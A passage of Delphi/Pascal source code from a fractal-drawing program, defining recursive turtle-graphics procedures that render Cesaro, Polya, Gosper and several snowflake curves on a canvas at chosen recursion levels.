sign[i] := sign1; sign1 := -sign1; end; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; inc(GFColor); bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; { of cesaromod } procedure Cesaro2(level: integer); var TempColor: TColor; maxcolx, maxrowy, {GfColor,} lc, {lcc,counter, } sign, i, generator_size, init_size: integer; { Xpoints, Ypoints: array[0..24] of Extended;} initiator_x1, initiator_x2, initiator_y1, initiator_y2: array[0..9] of Extended; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer); var j: integer; { b: Extended; } Xpoints, Ypoints: array[0..24] of Extended; begin dec(level); turtle_r := sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1)) / 2.0; Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[2] := X2; Ypoints[2] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turtle_x := X1; turtle_y := Y1; step; Xpoints[3] := turtle_x; Ypoints[3] := turtle_y; turn(90 * sign); step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; sign := -1; if level > 0 then begin for j := 0 to generator_size - 2 do begin X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level); end; end else begin { was TOO low so 240 is now 140} MainForm.Image2.Canvas.Moveto(Round(Xpoints[0] + 320), Round(140 - Ypoints[0])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[2] + 320), Round(140 - Ypoints[2])); MainForm.Image2.Canvas.Moveto(Round(Xpoints[1] + 320), Round(140 - Ypoints[1])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[3] + 320), Round(140 - Ypoints[3])); end; end; begin {GfColor :=4; } {pcxVGASetup;} generator_size := 3; init_size := 1; initiator_x1[0] := -150; initiator_x2[0] := 150; initiator_y1[0] := 0; {0} initiator_y2[0] := 0; {0} if level < 0 then level := 0 else if level > 8 then level := 8; if Level > 0 then begin level := 2 * level; { this was 16 levels } with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; TextOut(10, 10, 'Cesaro 2' + ' Level: ' + IStringer(Level)); end; end else begin for lc := 1 to 4 do begin level := lc * 2; { this was 16 levels } with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; TextOut(10, 10, 'Cesaro 2' + ' Level: ' + IStringer(Level)); {inc(GFColor); } bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; procedure polya(level: integer); var TempColor: TColor; maxcolx, maxrowy, {GfColor,} ill, iin, lc, {lcc,counter, } sign1, generator_size, init_size: integer; { Xpoints, Ypoints: array[0..24] of Extended;} initiator_x1, initiator_x2, initiator_y1, initiator_y2: array[0..9] of Extended; sign: array[0..16] of integer; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer); var j, k: integer; { a, b: Extended; } Xpoints, Ypoints: array[0..24] of Extended; begin {/1.41421} turtle_r := (sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1))) / 1.41421; Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[2] := X2; Ypoints[2] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turtle_x := X1; turtle_y := Y1; turn(sign[level] * 45); step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; dec(level); if level > 0 then begin for j := 0 to generator_size - 2 do begin X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level); sign[level] := -sign[level]; end; end else begin for k := 0 to generator_size - 2 do begin MainForm.Image2.Canvas.Moveto(Round(Xpoints[k] + 320), Round(240 - Ypoints[k])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[k + 1] + 320), Round(240 - Ypoints[k + 1])); end; end; end; begin {GfColor:=4; } if level < 0 then level := 0 else if level > 8 then level := 8; if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; sign1 := 1; generator_size := 3; init_size := 2; initiator_x1[0] := -150; initiator_x2[0] := 150; initiator_y1[0] := -75; {-75} initiator_y2[0] := -75; {-75} for ill := level downto 0 do begin sign[ill] := sign1; sign1 := -sign1; end; for iin := 0 to init_size - 2 do begin generate(initiator_x1[iin], initiator_y1[iin], initiator_x2[iin], initiator_y2[iin], level); end; TextOut(10, 10, 'Polya' + ' Level: ' + IStringer(Level)); end; end else begin for lc := 1 to 4 do begin level := lc; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; sign1 := 1; generator_size := 3; init_size := 2; initiator_x1[0] := -150; initiator_x2[0] := 150; initiator_y1[0] := -75; {-75} initiator_y2[0] := -75; {-75} for ill := level downto 0 do begin sign[ill] := sign1; sign1 := -sign1; end; for iin := 0 to init_size - 2 do begin generate(initiator_x1[iin], initiator_y1[iin], initiator_x2[iin], initiator_y2[iin], level); end; TextOut(10, 10, 'Polya' + ' Level: ' + IStringer(Level)); {inc(GFColor); } bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; { of Polya } procedure pgosper(level: integer); var TempColor: TColor; maxcolx, maxrowy, lc, i, generator_size, init_size: integer; gen_type: integer; sign: Extended; Xpoints, Ypoints: array[0..24] of Extended; initiator_x1, initiator_x2, initiator_y1, initiator_y2: array[0..9] of Extended; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer; gen_type: integer); var j, k, set_type: integer; { a,b,} temp: Extended; { Xpoints, Ypoints: array[0..24] of Extended;} begin case gen_type of 1: sign := -sign; 2: begin sign := -sign; temp := X1; X1 := X2; X2 := temp; temp := Y1; Y1 := Y2; Y2 := temp; end; 3: begin temp := X1; X1 := X2; X2 := temp; temp := Y1; Y1 := Y2; Y2 := temp; end; end; dec(level); turtle_r := (sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1))) {/ 1.81421}/ 2.6457513; Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[7] := X2; Ypoints[7] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turn(-19 * sign); turtle_x := X1; turtle_y := Y1; step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; turn(60 * sign); step; Xpoints[2] := turtle_x; Ypoints[2] := turtle_y; turn(120 * sign); step; Xpoints[3] := turtle_x; Ypoints[3] := turtle_y; turn(-60 * sign); step; Xpoints[4] := turtle_x; Ypoints[4] := turtle_y; turn(-120 * sign); step; Xpoints[5] := turtle_x; Ypoints[5] := turtle_y; step; Xpoints[6] := turtle_x; Ypoints[6] := turtle_y; if level = 0 then begin for k := 0 to generator_size - 2 do begin MainForm.Image2.Canvas.Moveto(Round(Xpoints[k] + 320), Round(175 - Ypoints[k] * 0.729)); MainForm.Image2.Canvas.Lineto(Round(Xpoints[k + 1] + 320), Round(175 - Ypoints[k + 1] * 0.729)); end; end else begin for j := 0 to generator_size - 2 do begin case j of 0, 3, 4, 5: set_type := 0; 2, 1, 6: set_type := 3; else set_type := 0; end; X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level, set_type); end; end; end; begin if level < 0 then level := 0 else if Level > 8 then Level := 8; if Level > 0 then begin if level < 3 then level := 3 else if Level > 5 then Level := 5; sign := 1; gen_type := 3; generator_size := 8; init_size := 1; initiator_x1[0] := -150; initiator_x2[0] := 150; initiator_y1[0] := 75; initiator_y2[0] := 75; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level, gen_type); end; TextOut(10, 10, 'Polya Gosper' + ' Level: ' + IStringer(Level)); end; end else begin for lc := 2 to 4 do begin level := lc; sign := 1; gen_type := 3; generator_size := 8; init_size := 1; initiator_x1[0] := -150; initiator_x2[0] := 150; initiator_y1[0] := 75; initiator_y2[0] := 75; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level, gen_type); end; TextOut(10, 10, 'Polya Gosper' + ' Level: ' + IStringer(Level)); bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; procedure snow7(level: integer); var TempColor: TColor; maxcolx, maxrowy, {GfColor,} lc, {lcc,counter,} i, generator_size, init_size {, gen_type}, sign: integer; { Xpoints, Ypoints: array[0..24] of Extended;} initiator_x1, initiator_x2, initiator_y1, initiator_y2: array[0..9] of Extended; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer; gen_type: integer; sign: integer); var j, k, set_type: integer; temp: Extended; Xpoints, Ypoints: array[0..24] of Extended; begin case gen_type of 1: begin sign := -sign; end; 2: begin sign := -sign; temp := X1; X1 := X2; X2 := temp; temp := Y1; Y1 := Y2; Y2 := temp; end; 3: begin temp := X1; X1 := X2; X2 := temp; temp := Y1; Y1 := Y2; Y2 := temp; end; end; dec(level); turtle_r := (sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1))) / 3.0; Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[7] := X2; Ypoints[7] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turtle_x := X1; turtle_y := Y1; turn(60 * sign); step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; step; Xpoints[2] := turtle_x; Ypoints[2] := turtle_y; turn(-60 * sign); step; Xpoints[3] := turtle_x; Ypoints[3] := turtle_y; turn(-60 * sign); step; Xpoints[4] := turtle_x; Ypoints[4] := turtle_y; turn(-60 * sign); step; Xpoints[6] := turtle_x; Ypoints[6] := turtle_y; turn(-60 * sign); step; Xpoints[5] := turtle_x; Ypoints[5] := turtle_y; if level = 0 then begin for k := 0 to generator_size - 1 do begin MainForm.Image2.Canvas.Moveto(Round(Xpoints[k] + 320), Round(240 - Ypoints[k])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[k + 1] + 320), Round(240 - Ypoints[k + 1])); end; end else begin for j := 0 to generator_size - 1 do begin case j of 0, 5: set_type := 1; 1, 2, 3, 6: set_type := 2; 4: set_type := 3; else set_type := 3; end; X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level, set_type, sign); end; end; end; begin {GfColor:=4;} {pcxVGASetup;} sign := 1; generator_size := 7; init_size := 1; initiator_x1[0] := -150; initiator_x2[0] := 150; initiator_y1[0] := -50; { } initiator_y2[0] := -50; { original ... backup initiator_x1[0] := -125; initiator_x2[0] := 125; initiator_y1[0] := 0; initiator_y2[0] := 0; } if level < 0 then level := 0 else if level > 8 then level := 8; if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level, 7 {gen type?}, sign); end; TextOut(10, 10, 'Snow 7 ' + ' Level: ' + IStringer(Level)); end; end else begin for lc := 1 to 4 do begin level := lc; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level, 7, sign); end; TextOut(10, 10, 'Snow 7 ' + ' Level: ' + IStringer(Level)); {inc(GFColor); } bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; procedure snowhall(level: integer); var TempColor: TColor; maxcolx, maxrowy, {GfColor,} lc, {lcc,counter,} i, generator_size, init_size, set_type: integer; sign: Extended; { Xpoints, Ypoints: array[0..24] of Extended;} initiator_x1, initiator_x2, initiator_y1, initiator_y2: array[0..9] of Extended; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer; gen_type: integer; sign: Extended); var j, k, set_type: integer; { a,b,} temp: Extended; Xpoints, Ypoints: array[0..24] of Extended; begin case gen_type of 1: sign := -sign; 2: begin sign := -sign; temp := X1; X1 := X2; X2 := temp; temp := Y1; Y1 := Y2; Y2 := temp; end; 3: begin temp := X1; X1 := X2; X2 := temp; temp := Y1; Y1 := Y2; Y2 := temp; end; end; dec(level); turtle_r := (sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1))) / 3.0; Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[11] := X2; Ypoints[11] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turn(60 * sign); turtle_x := X1; turtle_y := Y1; step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; step; Xpoints[2] := turtle_x; Ypoints[2] := turtle_y; turn(-60 * sign); step; Xpoints[3] := turtle_x; Ypoints[3] := turtle_y; turn(-60 * sign); step; Xpoints[4] := turtle_x; Ypoints[4] := turtle_y; turn(-120 * sign); step; turn(60 * sign); step; Xpoints[9] := turtle_x; Ypoints[9] := turtle_y; turn(120 * sign); step; Xpoints[10] := turtle_x; Ypoints[10] := turtle_y; turtle_r := (sqrt((Xpoints[9] - Xpoints[4]) * (Xpoints[9] - Xpoints[4]) + (Ypoints[9] - Ypoints[4]) * (Ypoints[9] - Ypoints[4]))) / 3.0; turtle_theta := point(Xpoints[4], Ypoints[4], Xpoints[9], Ypoints[9]); turn(-60 * sign); turtle_x := Xpoints[4]; turtle_y := Ypoints[4]; step; Xpoints[5] := turtle_x; Ypoints[5] := turtle_y; step; Xpoints[6] := turtle_x; Ypoints[6] := turtle_y; turn(60 * sign); step; Xpoints[7] := turtle_x; Ypoints[7] := turtle_y; turn(60 * sign); step; Xpoints[8] := turtle_x; Ypoints[8] := turtle_y; if level = 0 then begin for k := 0 to generator_size - 1 do begin MainForm.Image2.Canvas.Moveto(Round(Xpoints[k] + 320), Round(240 - Ypoints[k])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[k + 1] + 320), Round(240 - Ypoints[k + 1])); end; end else begin for j := 0 to generator_size - 1 do begin if level = 1 then begin case j of 2, 8, 10: set_type := 0; 0, 5: set_type := 1; 1, 3, 4: set_type := 2; 6, 7, 9: set_type := 3; else set_type := 3; end; end else if level > 1 then begin case j of 2, 8, 10: set_type := 0; 0: set_type := 1; 1, 3, 4: set_type := 2; 5, 6, 7, 9: set_type := 3; else set_type := 3; end; end else set_type := 3; X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level, set_type, sign); end; end; end; begin {GfColor:=4; } sign := 1; set_type := 0; generator_size := 11; init_size := 1; initiator_x1[0] := -150; initiator_x2[0] := 150; initiator_y1[0] := -75; initiator_y2[0] := -75; if level < 0 then level := 0 else if level > 8 then level := 8; if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level, set_type, sign); end; TextOut(10, 10, 'Snow Hall' + ' Level: ' + IStringer(Level)); end; end else begin for lc := 1 to 4 do begin level := lc; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level, set_type, sign); end; Textout(10, 10, 'Snow Hall' + ' Level: ' + IStringer(Level)); {inc(GFColor); } bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; { of Snow Hall } procedure snow13(level: integer); var TempColor: TColor; maxcolx, maxrowy, {GfColor,} lc, {lcc,counter,} i, generator_size, init_size, {gen_type,} sign: integer; { Xpoints, Ypoints: array[0..24] of Extended; } initiator_x1, initiator_x2, initiator_y1, initiator_y2: array[0..9] of Extended; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer; gen_type: integer; sign: integer); var j, k, set_type: integer; temp: Extended; Xpoints, Ypoints: array[0..24] of Extended; begin case gen_type of 1: begin sign := -sign; end; 2: begin sign := -sign; temp := X1; X1 := X2; X2 := temp; temp := Y1; Y1 := Y2; Y2 := temp; end; 3: begin temp := X1; X1 := X2; X2 := temp; temp := Y1; Y1 := Y2; Y2 := temp; end; end; dec(level); turtle_r := (sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1))) / 3.0; Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[13] := X2; Ypoints[13] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turtle_x := X1; turtle_y := Y1; turn(60 * sign); step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; step; Xpoints[2] := turtle_x; Ypoints[2] := turtle_y; turn(-60 * sign); step; Xpoints[3] := turtle_x; Ypoints[3] := turtle_y; turn(-60 * sign); step; Xpoints[4] := turtle_x; Ypoints[4] := turtle_y; turn(-60 * sign); step; Xpoints[12] := turtle_x; Ypoints[12] := turtle_y; turn(-60 * sign); step; Xpoints[11] := turtle_x; Ypoints[11] := turtle_y; turtle_r := (sqrt((Xpoints[11] - Xpoints[4]) * (Xpoints[11] - Xpoints[4]) + (Ypoints[11] - Ypoints[4]) * (Ypoints[11] - Ypoints[4]))) / 3.0; turtle_theta := point(Xpoints[4], Ypoints[4], Xpoints[11], Ypoints[11]); turtle_x := Xpoints[4]; turtle_y := Ypoints[4]; turn(-60 * sign); step; Xpoints[5] := turtle_x; Ypoints[5] := turtle_y; step; Xpoints[6] := turtle_x; Ypoints[6] := turtle_y; turn(60 * sign); step; Xpoints[7] := turtle_x; Ypoints[7] := turtle_y; turn(60 * sign); step; Xpoints[8] := turtle_x; Ypoints[8] := turtle_y; turn(60 * sign); step; Xpoints[10] := turtle_x; Ypoints[10] := turtle_y; turn(60 * sign); step; Xpoints[9] := turtle_x; Ypoints[9] := turtle_y; if level = 0 then begin for k := 0 to generator_size - 1 do begin MainForm.Image2.Canvas.Moveto(Round(Xpoints[k] + 320), Round(240 - Ypoints[k])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[k + 1] + 320), Round(240 - Ypoints[k + 1])); end; end else begin for j := 0 to generator_size - 1 do begin case j of 1, 2, 3, 4, 8, 9, 12: set_type := 0; 0, 5, 6, 7, 10, 11: set_type := 1; else set_type := 1; end; X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level, set_type, sign); end; end; end; begin {GfColor:=4; } sign := 1; generator_size := 13; init_size := 1; initiator_x1[0] := -150; initiator_x2[0] := 150; initiator_y1[0] := -75; {-50} initiator_y2[0] := -75; {50} { original initiator_x1[0] := -125; initiator_x2[0] := 125; initiator_y1[0] := 0; initiator_y2[0] := 0; } if level < 0 then level := 0 else if level > 8 then level := 8; if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level, 13, sign); end; TextOut(10, 10, 'Snow 13' + ' Level: ' + IStringer(Level)); end; end else begin for lc := 1 to 4 do begin level := lc; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level, 13, sign); end; Textout(10, 10, 'Snow 13' + ' Level: ' + IStringer(Level)); {inc(GFColor); } bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; end; { of Snow13 } procedure Snoflake(level: integer); var TempColor: TColor; maxcolx, maxrowy, GfColor, lc, {lcc,counter,} i, generator_size, init_size: integer; {Xpoints, Ypoints: array[0..24] of Extended;} initiator_x1, initiator_x2, initiator_y1, initiator_y2: array[0..9] of Extended; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer); var j, k: integer; { a, b: Extended; } Xpoints, Ypoints: array[0..24] of Extended; begin dec(level); turtle_r := (sqrt((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1))) / 3.0; Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[4] := X2; Ypoints[4] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turtle_x := X1; turtle_y := Y1; step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; turn(60); step; Xpoints[2] := turtle_x; Ypoints[2] := turtle_y; turn(-120); step; Xpoints[3] := turtle_x; Ypoints[3] := turtle_y; if level > 0 then begin for j := 0 to generator_size - 2 do begin X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level); end; end else begin for k := 0 to generator_size - 2 do begin MainForm.Image2.Canvas.Moveto(Round(Xpoints[k] + 320), Round(240 - Ypoints[k])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[k + 1] + 320), Round(240 - Ypoints[k + 1])); end; end; end; begin GfColor := 4; generator_size := 5; init_size := 3; initiator_x1[0] := -150; initiator_x1[1] := 0; initiator_x1[2] := 150; initiator_x2[0] := 0; initiator_x2[1] := 150; initiator_x2[2] := -150; initiator_y1[0] := -75; initiator_y1[1] := 185; initiator_y1[2] := -75; initiator_y2[0] := 185; initiator_y2[1] := -75; initiator_y2[2] := -75; if level < 0 then level := 0 else if level > 8 then level := 8; if Level = 0 then begin for lC := 1 to 4 do begin level := lc; with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; TextOut(10, 10, ' Snowflake' + ' Level: ' + IStringer(Level)); {inc(GFColor); } end; end; end else begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, GfColor], RGBArray[1, GfColor], RGBArray[2, GfColor]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; TextOut(10, 10, ' Snowflake' + ' Level: ' + IStringer(Level)); bRotateImage := False; {in the Drawing...} bRotatingImage := True; repeat Application.ProcessMessages until (bRotateImage = True); end; end; end; { of Snow } procedure gosper(level: integer); var TempColor: TColor; maxcolx, maxrowy, {gfColor,} lc, i, generator_size, init_size: integer; initiator_x1, initiator_x2, initiator_y1, initiator_y2: array[0..9] of Extended; procedure generate(X1: Extended; Y1: Extended; X2: Extended; Y2: Extended; level: integer); var j, k: integer; { a, b: Extended; } Xpoints, Ypoints: array[0..24] of Extended; begin dec(level); turtle_r := sqrt(((X2 - X1) * (X2 - X1) + (Y2 - Y1) * (Y2 - Y1)) / 7.0); Xpoints[0] := X1; Ypoints[0] := Y1; Xpoints[3] := X2; Ypoints[3] := Y2; turtle_theta := point(X1, Y1, X2, Y2); turtle_x := X1; turtle_y := Y1; turn(19.1); step; Xpoints[1] := turtle_x; Ypoints[1] := turtle_y; turn(-60); step; Xpoints[2] := turtle_x; Ypoints[2] := turtle_y; if level > 0 then begin for j := 0 to generator_size - 1 do begin X1 := Xpoints[j]; X2 := Xpoints[j + 1]; Y1 := Ypoints[j]; Y2 := Ypoints[j + 1]; generate(X1, Y1, X2, Y2, level); end; end else begin for k := 0 to generator_size - 1 do begin MainForm.Image2.Canvas.Moveto(Round(Xpoints[k] + 320), Round(175 - Ypoints[k])); MainForm.Image2.Canvas.Lineto(Round(Xpoints[k + 1] + 320), Round(175 - Ypoints[k + 1])); end; end; end; begin {GfColor := 4; } generator_size := 3; init_size := 6; { original ... backup} initiator_x1[0] := 0; initiator_x1[1] := 130; initiator_x1[2] := 130; initiator_x1[3] := 0; initiator_x1[4] := -130; initiator_x1[5] := -130; initiator_x2[0] := 130; initiator_x2[1] := 130; initiator_x2[2] := 0; initiator_x2[3] := -130; initiator_x2[4] := -130; initiator_x2[5] := 0; initiator_y1[0] := 150; initiator_y1[1] := 75; initiator_y1[2] := -75; initiator_y1[3] := -150; initiator_y1[4] := -75; initiator_y1[5] := 75; initiator_y2[0] := 75; initiator_y2[1] := -75; initiator_y2[2] := -150; initiator_y2[3] := -75; initiator_y2[4] := 75; initiator_y2[5] := 150; { always got lost on which way is UP initiator_y1[0] := 125; initiator_y1[1] := 50; initiator_y1[2] := -100; initiator_y1[3] := -175; initiator_y1[4] := -100; initiator_y1[5] := 50; initiator_y2[0] := 50; initiator_y2[1] := -100; initiator_y2[2] := -175; initiator_y2[3] := -100; initiator_y2[4] := 50; initiator_y2[5] := 175; } if level < 0 then level := 0 else if level > 8 then level := 8; if Level > 0 then begin with MainForm.Image2.Canvas do begin maxcolx := (FYImageX - 1); maxrowy := (FYImageY - 1); Brush.Color := FBackGroundColor; Brush.Style := bsSolid; FillRect(Rect(0, 0, maxcolx, maxrowy)); TempColor := RGB(RGBArray[0, Level], RGBArray[1, Level], RGBArray[2, Level]); Pen.Color := TempColor; Font.Color := TempColor; MainForm.Show; for i := 0 to init_size - 1 do begin generate(initiator_x1[i], initiator_y1[i], initiator_x2[i], initiator_y2[i], level); end; Textout(10, 10, 'Gosper' + ' Level: ' + IStringer(Level)); end; end else begin for lc := 1 to 4 do begin level := lc; with 